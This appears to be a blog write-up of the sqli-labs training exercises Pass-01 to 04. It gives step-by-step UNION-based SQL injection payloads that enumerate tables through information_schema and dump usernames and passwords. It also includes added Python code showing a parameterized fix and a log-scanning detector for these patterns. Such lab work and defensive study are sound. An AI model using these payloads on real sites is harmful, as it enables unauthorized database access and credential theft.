sql-labs
2022-07-02 19:44:00 【Young seed_】
sql-labs
- What is sql-labs?
- Pass-01, 02
- Determining whether injection exists
- Determining the number of fields
- union select to find the echoed positions
- Database name and login user name
- Finding the table names
- Finding the column names
- Dumping the data
- Quick method (note that the id value must be 0 or a negative number, otherwise it will not work)
- Pass-03
- Pass-04
What is sql-labs?
SQL injection (SQL Injection) is a security vulnerability that occurs at the database layer of a web application; it is the most common and simplest class of website vulnerability. The root cause is that the program does not validate or sanitize user-supplied data, so an attacker can append extra SQL to the SQL statements predefined in the web application and carry out unauthorized operations without the administrator's knowledge; the database server is tricked into executing arbitrary unauthorized queries, from which further data can be obtained.
Recommended video: [Repost] SQL injection, SSTI & Docker escape, HTB CTF - GoodGame (Bilibili).
Pass-01, 02
These two are not bad...
Looking it up online: Pass-01 is single-quote-based SQL injection, Pass-02 is integer-based injection.
Determining whether injection exists
Pass id=1 via GET and the page shows a result; pass id=2 via GET and you can see the page content change;
pass id=15 via GET and the page is abnormal.
Could it be that the ?id=1 parameter is spliced into the SQL statement and executed as SQL code?
Try ?id=1 and 1=2... no change.
The knowledge for Pass-02 starts here. Try closing the quote: ?id=1'and 1=1-- za (the letters after the comment are arbitrary...)
Mind the space (format), otherwise an error is reported, as pictured.
?id=1'and 1=2-- zaa: the page is abnormal (possible SQL injection).
Determining the number of fields
Use order by to count the fields: start from 1 and go up to 4; 3 is normal but 4 gives an abnormal page, so there are three fields.
union select to find the echoed positions
Input ?id=1'union select 1,2,3-- zaa and the previous result is still shown.
1,2,3 only occupy three positions (order by found 3 earlier), so any expression can be used there.
So try changing id=1 to id=15 (because the page has no result for it).
Note: the article says that, knowing there are only three columns, find the position of each column with ?id=0' union select 1,2,3 --+ (note that the id value must be 0 or a negative number, otherwise it will not work).
Database name and login user name
Replace position 2 with database() to display the database name of the current page: security.
To query the current database name and the current login user name, use ?id=0' union select 1,database(),user() -- zaa
user() in position 3 is the current login user name.
Finding the table names
?id=15'union select 1,table_name,3 from information_schema.tables where table_schema='security'-- zaa
| Term | Meaning |
|---|---|
| table_name | the table name |
| information_schema | the database's own built-in schema |
| table_schema | literally, the database (library) name |
Second table (the first one can then be expressed with limit 0,1):
?id=15'union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 1,1-- zaa
Third table (change the 1 in front of limit 1,1 to 2), i.e.
?id=15'union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 2,1-- zaa
and so on...
Finding the column names
?id=15'union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'-- zaa
emails: replace it with the table you want.
Example:
?id=15'union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='referers'-- zaa
Dumping the data
?id=15'union select 1,id,3 from emails-- zaa
As above, emails: replace it with the table you want.
Quick method (note that the id value must be 0 or a negative number, otherwise it will not work)
Replace position 2 with database() to display the database name: security.
Reference article...
Table names
After the database name, dump the tables with ?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
All the table names in one step...
Column names
?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),3 --+
emails: replace it with the table you want.
Data
Format: ?id=0' union select 1,(select group_concat(concat_ws(0x7e, a column of the table, a column of the table)) from table name),3 --+
0x7e should just be a placeholder here (it is the separator argument of concat_ws)...; that position can also be a column of the table, compare 02 and 03.
01
?id=0' union select 1,(select group_concat(concat_ws(0x7e,id,email_id)) from emails),3 --+ dumps the following.
02
?id=0' union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3 --+ dumps the following.
03
?id=0' union select 1,(select group_concat(concat_ws(id,username,password)) from users),3 --+ dumps the following.
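As an added example (not from the original post or from the sqli-labs project), the lab's query shape rebuilt on SQLite so the steps above can be replayed offline against the vulnerable string-built lookup and against a hardened, parameterized one; sqlite_version() and sqlite_master stand in for MySQL's version()/database() and information_schema, and the table rows are constructed.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lab's security.users table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "constructed-pw-1"), (2, "bob", "constructed-pw-2")])
    return conn

def lookup_vulnerable(conn, raw_id: str):
    """The lab's bug: the raw GET value is spliced into WHERE id='...' LIMIT 0,1."""
    sql = f"SELECT id, username, password FROM users WHERE id='{raw_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()

def lookup_safe(conn, raw_id: str):
    """Hardened form: reject anything that is not an integer, then bind it as a parameter."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return None  # a quote, comment or UNION never reaches the SQL parser
    return conn.execute(
        "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1", (id_value,)).fetchone()

def column_count_probe(lookup, conn, max_cols: int = 10) -> int:
    """The page's ORDER BY step: the first n that errors reveals n-1 columns; 0 means nothing leaked."""
    for n in range(1, max_cols + 1):
        try:
            lookup(conn, f"1' order by {n}-- za")
        except sqlite3.OperationalError:
            return n - 1
    return 0

def db_version(conn) -> str:
    """SQLite's counterpart of the page's version()/database() echo."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    echo = "0' union select 1,sqlite_version(),3-- za"  # same shape as ?id=0' union select 1,database(),3
    print("vulnerable:", lookup_vulnerable(db, echo))  # the injected value is echoed in position 2
    print("hardened:  ", lookup_safe(db, echo))        # None
    print("columns leaked:", column_count_probe(lookup_vulnerable, db), column_count_probe(lookup_safe, db))
```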
Pass-03
Looking at the source code... the value is found to be enclosed in parentheses, so the input is not treated as code, which invalidates the injected code.
So after ' add a ).
| Step | Payload |
|---|---|
| Determine whether injection exists | ?id=1')and 1=1-- za |
| Determine the number of fields | ?id=1')order by 1-- za |
| union select to find the echoed positions | ?id=1')union select 1,2,3-- zaa |
| Find the table names | ?id=15')union select 1,table_name,3 from information_schema.tables where table_schema='security'-- zaa |
| Find the column names | ?id=15')union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'-- zaa |
| Dump the data | ?id=15')union select 1,id,3 from emails-- zaa |
Pass-04
From the figure, compared with 03, the single quote becomes a double quote...
| Step | Payload |
|---|---|
| Determine whether injection exists | ?id=1")and 1=1-- za |
| Determine the number of fields | ?id=1")order by 1-- za |
| union select to find the echoed positions | ?id=1")union select 1,2,3-- zaa |
| Find the table names | ?id=15")union select 1,table_name,3 from information_schema.tables where table_schema='security'-- zaa |
| Find the column names | ?id=15")union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'-- zaa |
| Dump the data | ?id=15")union select 1,id,3 from emails-- zaa |
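Added example, not part of the original post: a small detector for the request patterns used in Pass-01 through Pass-04 (closing quote or parenthesis, order by, union select, information_schema, group_concat, comment terminator), run over constructed Apache-style access-log lines; the hosts, timestamps and sizes in the log are made up.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures for the probe sequence walked through above, matched on the URL-decoded query string.
SIGNATURES = {
    "closing quote/paren": re.compile(r"""(['"]\)?|\))\s*(and|or|order|union)\b""", re.I),
    "order-by column probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "row aggregation": re.compile(r"\bgroup_concat\s*\(", re.I),
    "comment terminator": re.compile(r"--\s|--\+|#"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (Apache combined format); only the first one is a normal request.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jul/2022:19:44:00 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 734',
    '10.0.0.5 - - [02/Jul/2022:19:44:07 +0800] "GET /sqli-labs/Less-3/?id=1%27)and%201=1--%20za HTTP/1.1" 200 734',
    '10.0.0.5 - - [02/Jul/2022:19:44:12 +0800] "GET /sqli-labs/Less-4/?id=1%22)order%20by%203--%20za HTTP/1.1" 200 734',
    '10.0.0.5 - - [02/Jul/2022:19:44:20 +0800] "GET /sqli-labs/Less-1/?id=0%27%20union%20select%201,'
    '(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3%20--+ HTTP/1.1" 200 912',
]

def decoded_query(log_line: str) -> str:
    """Pull the request target out of the log line and decode its query string (+ becomes a space)."""
    m = REQUEST_RE.search(log_line)
    return unquote_plus(urlsplit(m.group(1)).query) if m else ""

def classify(log_line: str) -> list:
    """Names of every signature that fires on one log line (empty list for a clean request)."""
    query = decoded_query(log_line)
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan(lines) -> list:
    """(line number, matched signatures) for each suspicious request, in log order."""
    return [(n, hits) for n, hits in ((n, classify(line)) for n, line in enumerate(lines, 1)) if hits]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```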